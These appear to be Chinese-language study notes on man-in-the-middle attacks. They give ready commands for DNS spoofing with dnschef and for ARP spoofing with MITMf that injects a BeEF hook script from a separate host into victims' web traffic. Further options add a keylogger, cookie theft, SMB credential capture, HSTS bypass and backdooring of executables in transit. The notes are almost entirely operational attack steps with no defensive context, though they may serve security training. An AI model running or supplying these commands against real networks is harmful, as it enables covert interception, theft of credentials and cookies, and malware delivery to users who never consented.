欺骗的目的是让流量重定向
DNS欺骗
前提是修改受害者的dns配置
dnschef 启动个假的dns服务器
dnschef --fakeip=1.1.1.10 --
fakedomains=www.google.com,www.youtube.com --interface 1.1.1.2 -q
--fakeip 欺骗的域名最终解析到的ip
--fakedomains 欺骗的域名
--interface 在哪个ip对应的网卡上进行欺骗,开启一个假的dns服务器
注入XSS
即使没有XSS漏洞,也可以凌空向每个HTTP请求注入XSS攻击代码,一旦打手,影响范围巨大,如果中间人发生在运营商路线,及其难被发现
Mitmf 安装
注意可能有问题
– pip uninstall twisted
– wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-
15.5.0.tar.bz2
– pip install ./Twisted-15.5.0.tar.bz2
启动beef
cd usr/share/beef-xss
./beef
mitmf 插入
--spoof 使用欺骗
--arp 使用arp欺骗
-i 指定网卡
--gateway 网关
--target 目标
--inject 注入
--js-url 注入的url
mitmf --spoof --arp -i eth0 --gateway 1.1.1.1 --target 1.1.1.2 --inject
--js-url http://1.1.1.3:3000/hook.js
--jskeylogger 键盘记录器
mitmf --spoof --arp -i eth0 --gateway 192.168.20.2 --target 192.168.20.1 --jskeylogger
--upsidedownternet 把图片转180度(开玩笑的东西)
--screen 屏幕快照(var/log/mitmf,十秒一张)
--ferretng 窃取cookie
--browserprofiler 浏览器及插件信息(看看flash java的版本,这俩漏洞多)
--smbtrap --smbauth
收集目标smb的帐号信息
--hsts
绕过 HSTS 的限制
HTTP strict Transport Security
防止协议降级cookie窃取
安全策略通过HTTP相应头实施
限制user-agent https等
--filepwn
凌空插后门
有执行程序经过中间人的话就加入后门,并不是所有的都能插后门